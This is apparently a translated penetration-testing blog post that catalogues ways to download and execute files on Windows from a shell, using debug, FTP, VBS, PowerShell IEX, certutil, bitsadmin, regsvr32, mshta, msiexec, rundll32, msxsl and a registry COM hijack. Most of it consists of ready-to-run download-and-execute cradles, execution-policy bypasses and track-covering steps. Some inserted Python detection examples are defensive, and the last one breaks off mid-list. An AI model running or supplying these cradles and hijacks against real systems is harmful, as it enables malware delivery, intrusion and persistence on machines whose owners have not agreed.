Uploading, Downloading and Executing Files from a Windows Terminal

Date: 2022-07-28

Note: this article is shared so that security practitioners, web developers and operations staff can use it in their daily work and defend against malicious attacks; do not misuse the techniques described below for illegal activity.


0x00 Introduction

Description: as a security practitioner you will often run into the question, during a penetration test, of how to upload an executable to a Windows machine when all you have is a shell (mainly because there is no GUI to work with). Here I share the experience and methods from my own penetration tests.

0x01 Methods

(1) debug

Description: debug is a program-debugging tool. Its functions include entering, changing, tracing and running assembly-language programs directly; inspecting operating-system memory and the contents of the ROM BIOS; viewing and changing values in RAM; and reading and writing floppy-disk data by sector or by file.

How debug is used here: convert the exe to be uploaded into hexadecimal, write the hex into a file with echo commands, and then use debug to rebuild the exe from the hex. Debug's ability to turn hexadecimal input back into an executable file is what makes this work.

Tested in practice with the exe2hex tool shipped in Kali:

exe2hex -x demo.exe
[*] exe2hex v1.5.1
[i] Outputting to /root/demo.bat (BATch) and /root/demo.cmd (PoSh)
[+] Successfully wrote (BATch) /root/demo.bat    # run with cmd
[+] Successfully wrote (PoSh) /root/demo.cmd     # run with PowerShell

$debug > paste the file contents into the cmd prompt and run them in order
-r
-q  quit
or simply run the batch file:
.\demo.bat

REM key statements
debug /?
REM check whether debug exists
if NOT %ERRORLEVEL% == 0 echo &echo &echo &echo **** **** **** **** ****&echo *** Missing DEBUG.exe ***&echo **** **** **** **** ****&exit /b
echo n demo.0>demo.hex
echo e 0100>>demo.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00>>demo.hex
debug<demo.hex
move /Y demo.0 demo.exe
echo. >demo.hex
del /F /Q demo.hex demo.0
dir demo.exe

WeiyiGeek.

Additional notes:

  • The generated demo.cmd can be used with PowerShell to convert the hex back into an exe.

Caveats:

  • Debug is no longer shipped with Windows 7 and later; DOSBox and debug.exe have to be downloaded from their official sites.
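To look at the DEBUG-script format from the defender's side, here is an added example in Python (not part of the original article and not exe2hex's code): it parses a script in the n / e / rcx / w / q form that the echo lines above build up, reassembles the bytes without running DEBUG, and checks whether the result carries the MZ header and DOS-stub text of a Windows executable, which is the check a mail gateway or endpoint scanner would apply to a .bat or .txt that smuggles a PE. The sample script, the benign sample and the helper names (parse_debug_script, pe_indicators, assess) are constructed for this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample (not read from disk): the DEBUG script form that the
# "echo ... >>demo.hex" lines above build up. n = output file name, e = enter
# bytes at an address, rcx + value = file length in CX, w = write, q = quit.
SAMPLE_DEBUG_SCRIPT = """n demo.0
e 0100
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e
rcx
0047
w
q
"""

HEX_ONLY = re.compile(r"^(?:[0-9a-fA-F]{2}\s*)+$")
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


@dataclass
class DebugScript:
    filename: str = ""                                   # from the "n <name>" line
    data: bytearray = field(default_factory=bytearray)   # bytes entered with "e"
    declared_size: Optional[int] = None                  # value given after "rcx"
    load_addresses: List[int] = field(default_factory=list)


def parse_debug_script(text: str) -> DebugScript:
    """Reassemble the bytes a DEBUG script would write, without running DEBUG."""
    script = DebugScript()
    expect_cx = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_cx:                        # the line after "rcx" is the new CX value
            script.declared_size = int(line, 16)
            expect_cx = False
            continue
        lower = line.lower()
        if lower.startswith("n "):
            script.filename = line[2:].strip()
        elif lower.startswith("e "):         # "e ADDR [bytes...]"
            parts = line.split()
            script.load_addresses.append(int(parts[1], 16))
            script.data.extend(bytes.fromhex("".join(parts[2:])))
        elif lower == "rcx":
            expect_cx = True
        elif lower in ("w", "q"):
            continue
        elif HEX_ONLY.match(line):           # continuation line of bare hex bytes
            script.data.extend(bytes.fromhex(line))
        # anything else is not part of the format and is ignored
    return script


def pe_indicators(data: bytes) -> dict:
    """Cheap checks for the signature of a Windows executable in the rebuilt blob."""
    return {
        "mz_header": data[:2] == b"MZ",
        "dos_stub_text": DOS_STUB_TEXT in data,
    }


def assess(text: str) -> dict:
    """Parse a DEBUG script and report whether it smuggles an executable."""
    script = parse_debug_script(text)
    ind = pe_indicators(bytes(script.data))
    return {
        "filename": script.filename,
        "size": len(script.data),
        "declared_size": script.declared_size,
        "size_matches": script.declared_size == len(script.data),
        "looks_like_pe": ind["mz_header"] or ind["dos_stub_text"],
        **ind,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_DEBUG_SCRIPT))
```

The size check compares the CX value the script sets with the number of bytes actually entered; a mismatch means DEBUG would write a truncated or padded file, which is a useful integrity check even when such scripts turn up for legitimate reasons.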

(2) FTP

Description: set up an FTP server, then record the FTP commands in a text file and use it to download.

echo open 192.168.1.1 21 > ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo ftp >> ftp.txt
echo GET test.exe >> ftp.txt
REM delete the file on the server afterwards to cover tracks
echo del test.exe >> ftp.txt
ftp -A -s:ftp.txt
REM -A anonymous login; PUT uploads a file, GET downloads a file, BIN sets binary mode for uploads and downloads


Taking anonymous users as the example, configure vsftpd.conf as follows:

# vsftpd example config file /etc/vsftpd.conf
anon_upload_enable=YES
anon_mkdir_write_enable=YES
local_root=/var/www/html
chroot_local_user=YES
anon_root=/var/www/html

Note: the first time ftp is used to download, the Windows firewall will pop up and block it, so remember to add a firewall rule before use.

(3) VBS-WScript.exe

Description: you never know how powerful VBS is; it is said that the first line of code the MySQL author wrote was in VBS. The downloader combines the Msxml2.XMLHTTP and ADODB.Stream objects.

' Standalone VBS downloader; the echo commands further below write the same script to download.vbs, which downloads ssss2.exe when run
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://10.10.10.101/text.txt",0   ' request the document
Post.Send()

Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1   ' 1 = binary
aGet.Open()
aGet.Write(Post.responseBody)   ' write the response body to a file
aGet.SaveToFile "C:\text.txt",2

'-----------------------------------------------------------'
REM running the following echo commands in order generates download.vbs; then run download.vbs to download ssss2.exe
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs

echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs

Another VBS download script:

Usage: cscript //nologo C:\inetpub\wwwroot\wget.vbs <remote URL> <local filename>

' VBS script begins; this first snippet launches a command through the MMC20.Application COM object
Set oHttp = CreateObject("MMC20.Application")
a=oHttp.Document.ActiveView.ExecuteShellCommand("calc.exe","d:","","Minimized")
'View.ExecuteShellCommand( _
  'ByVal Command As String, _
  'ByVal Directory As String, _
  'ByVal Parameters As String, _
  'ByVal WindowState As String _
')

REM the following echo commands write wget.vbs
echo iRemote=LCase(Wscript.Arguments(0)) >>C:\wget.vbs
echo iLocal=LCase(Wscript.Arguments(1)) >>C:\wget.vbs
echo wscript.echo "[!]GET ",iRemote >>C:\wget.vbs

echo set xPost=CreateObject("Microsoft.XMLHTTP") >>C:\wget.vbs
echo xPost.Open "GET",iRemote,0 >>C:\wget.vbs
echo xPost.Send() >>C:\wget.vbs

echo set sGet=CreateObject("ADODB.Stream") >>C:\wget.vbs
echo sGet.Mode=3 >>C:\wget.vbs
echo sGet.Type=1 >>C:\wget.vbs
echo sGet.Open() >>C:\wget.vbs
echo sGet.Write xPost.ResponseBody >>C:\wget.vbs
echo sGet.SaveToFile iLocal,2 >>C:\wget.vbs

(4) Powershell.exe

Description: this is also an essential tool for penetration testing on Windows.

powershell (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/test.js','D:\text.txt')
REM the following execute the downloaded content directly (parameters can be appended)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/test.js')"
powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/1.bat')

Using a PowerShell script to upload psexec.exe to the target machine:

REM Method 1
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1

# Method 2: wget.ps1, saved in the current directory
$storageDir=$pwd
$webclient=New-Object System.Net.WebClient
$url="http://10.11.0.79/payload/mp_64.exe"
$file="mp_64.exe"
$webclient.DownloadFile($url,$file)

REM several ways to bypass the script execution policy:
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

On a target that has Office installed, the following PowerShell code downloads a DLL and executes it by registering it as an Excel XLL:

$path="D:\test\msg1.dll"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll $path
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($path)

Method 3: convert hex into an exe

C:\Users\WeiyiGeek\Desktop>echo | set /p="5f636f6f6b696500" 1>>demo.hex
C:\Users\WeiyiGeek\Desktop>powershell -Command "$h=Get-Content -readcount 0 -path './demo.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'demo.exe' -value $b;Remove-Item -force demo.hex;"

(5) csc.exe

The C# compiler from the Microsoft .NET Framework, included by default on Windows; it compiles a .cs file into an exe from the command line.

// compile the C# downloader:
C:\Windows\Microsoft.NET\Framework\v4.0.50727\csc.exe /out:C:\download.exe C:\download.cs

// C:\download.cs:
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:\test\update\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName(URLAddress));
        }
    }
}

Note: the absolute path to csc.exe depends on the .NET version installed on the system.

(6) JScript

Description: compared with the Scripting.FileSystemObject used in JSRat, switching to ADODB.Stream is simpler and more efficient.

Save the following code as a .js file and run it directly to download the file:

var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://127.0.0.1/1.bat",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\1.bat", 2);
    Stream.Close();
}


(7) rundll32.exe

Description: sometimes a `\` has to be added to the path to prevent escaping; merged into a single rundll32 command line (similar to how JSRat is launched):

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}

Run a command to open the program we uploaded. IE must allow ActiveX scripting; other browsers do not support ActiveX by default and need their configuration changed.

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);
window.close();
</script>

(8) hta

Description: adds minimize and auto-exit behaviour to the HTA program; the HTA window is minimized while it runs and the program exits automatically once the download finishes. Save the following code as an .hta file:

<html>
<head>
    <!-- same code as the JScript version -->
    <script>
    var Object = new ActiveXObject("MSXML2.XMLHTTP");
    Object.open("GET","http://192.168.174.145/ssss2.exe",false);
    Object.send();
    if (Object.Status == 200)
    {
        var Stream = new ActiveXObject("ADODB.Stream");
        Stream.Open();
        Stream.Type = 1;
        Stream.Write(Object.ResponseBody);
        Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
        Stream.Close();
    }
    window.close();
    </script>
    <HTA:APPLICATION ID="test" WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>

(9) bitsadmin.exe

Description: download a remote file and save it to a specified directory (here the user's Downloads folder: %Userprofile%\Downloads)

> bitsadmin /transfer Downloadjob /download /priority normal http://www.c.cn/logo.gif %Userprofile%\Downloads\png.gif
bitsadmin /transfer n1 /download /priority normal http://127.0.0.1/test.js C:\q.zip.js


REM metasploit > meterpreter > shell:
C:\Windows>bitsadmin /transfer Downloadjob /download /priority normal http://10.7.45.37/sb360.exe %systemroot%\back.exe
C:\Windows>back.exe
back.exe


(10) regsvr32.exe

REM this registration-based approach is fairly novel
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

REM js.png contents:
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

(11) mshta.exe

mshta http://site.com/calc.hta
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

REM payload.sct:
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>


#calc.hta
<HTML>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD>
    <script language="VBScript">
        Window.ReSizeTo 0, 0
        Window.moveTo -2000,-2000
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
        self.close
    </script>
    </HEAD>
<body>
    demo
</body>
</HTML>

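The .sct and .hta files in sections (10) and (11) share a small set of tell-tale features: a COM registration with a progid and classid, an embedded JScript or VBScript block, a WScript.Shell object with a Run call and, in the HTA, code that hides its own window. The following added example (not the article's code; the sample files are inline copies of the listings above, and the indicator names and the analyze helper are constructed for this example) is a Python triage routine that extracts that metadata and flags those behaviours, as a content filter or sandbox pre-check might before the file ever reaches a script host.

```python
import re
from typing import Dict

# Constructed copies of the scriptlet and HTA shown above, embedded so this runs offline.
SAMPLE_SCT = """<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
    >
</registration>
<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
"""

SAMPLE_HTA = """<HTML>
<HEAD>
<script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
</script>
<HTA:APPLICATION ID="test" WINDOWSTATE="minimize">
</HEAD>
<body>demo</body>
</HTML>
"""

# A stylesheet with no embedded script, to show what a clean result looks like.
SAMPLE_CLEAN_XSL = """<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><xsl:value-of select="customers/customer/name"/></xsl:template>
</xsl:stylesheet>
"""

ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
REGISTRATION = re.compile(r"<registration\b([^>]*)>", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)

# Behaviours worth flagging, named after what the code does rather than after a tool.
INDICATORS = {
    "shell_object": re.compile(r'(?:ActiveXObject|CreateObject)\s*\(\s*"WScript\.Shell"', re.I),
    "run_call": re.compile(r'\.Run\s*\(?\s*"', re.I),
    "http_client": re.compile(r'"(?:MSXML2|Microsoft)\.XMLHTTP"', re.I),
    "binary_stream": re.compile(r'"ADODB\.Stream"', re.I),
    "window_hiding": re.compile(r'ReSizeTo\s+0\s*,\s*0|moveTo\s+-\d+|WINDOWSTATE\s*=\s*"minimize"', re.I),
    "remotable_registration": re.compile(r'remotable\s*=\s*"true"', re.I),
}


def file_type(text: str) -> str:
    low = text.lower()
    if "<scriptlet>" in low:
        return "scriptlet"
    if "<hta:application" in low:
        return "hta"
    if "<xsl:stylesheet" in low:
        return "xsl"
    return "unknown"


def analyze(text: str) -> Dict:
    """Extract registration metadata and script blocks, then scan for indicators."""
    reg = {}
    m = REGISTRATION.search(text)
    if m:
        reg = {k.lower(): v for k, v in ATTR.findall(m.group(1))}
    scripts = []
    for attrs, body in SCRIPT_BLOCK.findall(text):
        lang = {k.lower(): v for k, v in ATTR.findall(attrs)}.get("language", "")
        scripts.append({"language": lang, "lines": len(body.strip().splitlines())})
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "file_type": file_type(text),
        "registration": reg,
        "scripts": scripts,
        "indicators": hits,
        #: a shell object plus a Run call is the minimum needed to spawn a process
        "spawns_process": "shell_object" in hits and "run_call" in hits,
    }


if __name__ == "__main__":
    for name, sample in (("sct", SAMPLE_SCT), ("hta", SAMPLE_HTA), ("xsl", SAMPLE_CLEAN_XSL)):
        print(name, analyze(sample))
```

Regular expressions are used instead of an XML parser on purpose: these files are consumed by tolerant hosts (scrobj.dll, mshta.exe) and are frequently not well-formed XML, for instance the uppercase `<?XML` declaration and the HTML-in-HTA mix above, so a strict parser would reject exactly the files that matter.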
(12) certutil.exe

Description: certutil's use in penetration testing, as a supplement to the cmd downloader methods above. certutil is used to back up and manage Certificate Services and is available from XP through Win10; see https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx for more details.

REM save in the current directory, with the same name as the downloaded file
certutil -urlcache -split -f http://127.0.0.1/current.inf

REM save in the current directory under a specified name
certutil -urlcache -split -f http://127.0.0.1/current.inf demo.inf

REM save in the cache directory under a random name
certutil -urlcache -f 

REM battlefield cleanup (cache cleanup)
REM list cache entries:
certutil.exe -urlcache *
certutil -urlcache -f http://127.0.0.1/current.inf delete


(13) msiexec

Description: msiexec is the installer for Windows Installer (MSI) packages.

msfvenom -f msi -p windows/exec CMD=calc.exe > calc.png
msiexec /q /i http://site.com/payloads/calc.png

(14) IEExec.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://site.com/files/test64.exe


(15) IEXPLORE.exe

Description: this requires IE to have a command-execution vulnerability (an exploit such as ms14_064 can be used):

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp

(16) Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

(17) Regasm/Regsvc

Description: the DLL can be written in C#.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

(18) Downloading third-party tools

The idea here is to download a third-party tool with bitsadmin first, and then use that tool to transfer files.

1) wget

bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip

Running this downloads the wget archive wget.zip. Note: Windows does not ship a command for extracting zip files, but the extraction can be done with VBS. Save the following code as a .vbs file to unzip it:

UnZip "C:\test\update\wget.zip","C:\test\update\wget"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub

After a successful unzip, files can be transferred with wget.exe:

C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe


2) tftp: same idea as above; first download tftp.exe with bitsadmin, then transfer files with tftp

bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe

tftp -i 192.168.174.151 GET tftpssss2.exe C:\test\update\ssss2.exe


3) Python

This amounts to base64-encoding the Python script, then decoding and executing it again:

python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"

import base64; exec base64.b64decode("aW1wb=")


4) msxsl.exe

msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl

demo.xml:
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>

exec.xsl:
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace"> <!-- key point -->
  
<msxsl:script language="JScript" implements-prefix="user">
   function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
    return nodelist.nextNode().xml;
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

5) pubprn.vbs

Description: a batch file that downloads an SCT file and hijacks a COM object:

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

#test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>

</scriptlet>

test.bat (this batch file uses certutil to download the sct file and hijack a COM object, popping up the calculator):

@echo off
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /ve /t REG_SZ /d C:\WINDOWS\system32\scrobj.dll /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /v ThreadingModel /t REG_SZ /d Apartment /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

certutil 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /f 1>nul 2>&1
echo Done!

0x02 Supplementary methods

Description: when UNC/WebDAV paths are available, several more tricks can be used to run executable scripts:

cmd.exe /k < \\webdavserver\folder\batchfile.txt (could not reproduce)

REM pcalua.exe:
pcalua.exe -a \\server\payload.dll

REM Msbuild
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
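Almost every technique in this article leaves the same evidence on the endpoint: a signed Windows binary started with a command line that carries a URL, a UNC path, a redirected script file or inline script. As an added example (not from the article), the Python below runs a rule set derived from the command lines in sections (1) through (17) and 0x02 over constructed process-creation records and reports which records match, while letting routine uses of the same binaries pass. The pipe-delimited record format (timestamp|host|user|parent image|command line), the host and user names, and the rule names are assumptions made for this example; the regular expressions are indicative, not an exhaustive signature set.

```python
import re
from collections import Counter
from typing import Dict, List

# Constructed process-creation records (timestamp|host|user|parent image|command line),
# modelled on the command lines catalogued in this article plus a few benign ones.
SAMPLE_LOG = [
    r"2022-07-28T10:00:01|WS01|alice|C:\Windows\System32\cmd.exe|certutil -urlcache -split -f http://192.168.174.145/current.inf demo.inf",
    r"2022-07-28T10:00:05|WS01|alice|C:\Windows\System32\cmd.exe|bitsadmin /transfer n1 /download /priority normal http://192.168.174.145/test.js C:\q.zip.js",
    r"2022-07-28T10:00:09|WS01|alice|C:\Windows\explorer.exe|regsvr32 /u /s /i:http://192.168.174.145/js.png scrobj.dll",
    r"2022-07-28T10:00:12|WS02|bob|C:\Windows\System32\cmd.exe|mshta http://192.168.174.145/calc.hta",
    r"2022-07-28T10:00:15|WS02|bob|C:\Windows\System32\cmd.exe|msiexec /q /i http://192.168.174.145/payloads/calc.png",
    r'2022-07-28T10:00:18|WS02|bob|C:\Windows\System32\cmd.exe|rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();',
    r"2022-07-28T10:00:21|WS03|carol|C:\Windows\System32\cmd.exe|powershell.exe -ExecutionPolicy Bypass -NoProfile -File wget.ps1",
    r"2022-07-28T10:00:24|WS03|carol|C:\Windows\System32\cmd.exe|powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.174.145/1.bat')",
    r"2022-07-28T10:00:27|WS03|carol|C:\Windows\System32\cmd.exe|cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://192.168.174.145/test.sct",
    r"2022-07-28T10:00:30|WS03|carol|C:\Windows\System32\cmd.exe|reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f",
    r'2022-07-28T10:00:33|WS04|dave|C:\Windows\System32\cmd.exe|cmd /V /c "set MB=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe & !MB! /preprocess \\webdavserver\folder\payload.xml > payload.xml"',
    r"2022-07-28T10:00:36|WS04|dave|C:\Windows\System32\cmd.exe|debug<demo.hex",
    r"2022-07-28T10:00:39|WS04|dave|C:\Windows\System32\cmd.exe|ftp -A -s:ftp.txt",
    # benign activity that the same binaries produce every day
    r"2022-07-28T10:01:00|WS01|alice|C:\Windows\System32\cmd.exe|certutil -verify C:\certs\server.cer",
    r"2022-07-28T10:01:03|WS02|bob|C:\Windows\System32\cmd.exe|bitsadmin /list /allusers",
    r"2022-07-28T10:01:06|WS03|carol|C:\Windows\System32\cmd.exe|powershell Get-Process",
    r"2022-07-28T10:01:09|WS04|dave|C:\Windows\System32\cmd.exe|reg add HKEY_CURRENT_USER\Software\Contoso\App /v Theme /t REG_SZ /d Dark /f",
]

# (rule name, case-insensitive regex over the command line); one rule per section above.
RULES = [
    ("certutil_urlcache_download", r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://"),
    ("bitsadmin_transfer",         r"\bbitsadmin(?:\.exe)?\b.*/transfer\b"),
    ("regsvr32_remote_scriptlet",  r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b"),
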